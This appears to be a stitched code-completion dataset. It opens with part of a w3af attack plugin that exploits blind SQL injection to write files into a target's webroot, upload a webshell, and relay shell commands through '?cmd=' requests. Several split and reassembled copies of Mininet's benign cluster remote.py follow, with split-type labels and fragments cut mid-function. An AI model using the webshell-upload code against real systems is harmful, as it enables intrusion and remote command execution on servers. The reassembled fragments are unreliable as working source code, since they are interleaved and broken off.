'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _upload_webshell(self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
return False
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
'''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody())
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell' | random_line_split | |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None,
controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node
server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
"Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs)
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class | (RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result))
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs)
| RemoteHost | identifier_name |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None,
controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node
server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
"Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs)
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class RemoteHost(RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
|
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs)
| if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result)) | conditional_block |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None, | server: remote server (optional)
user: user on remote server (optional)
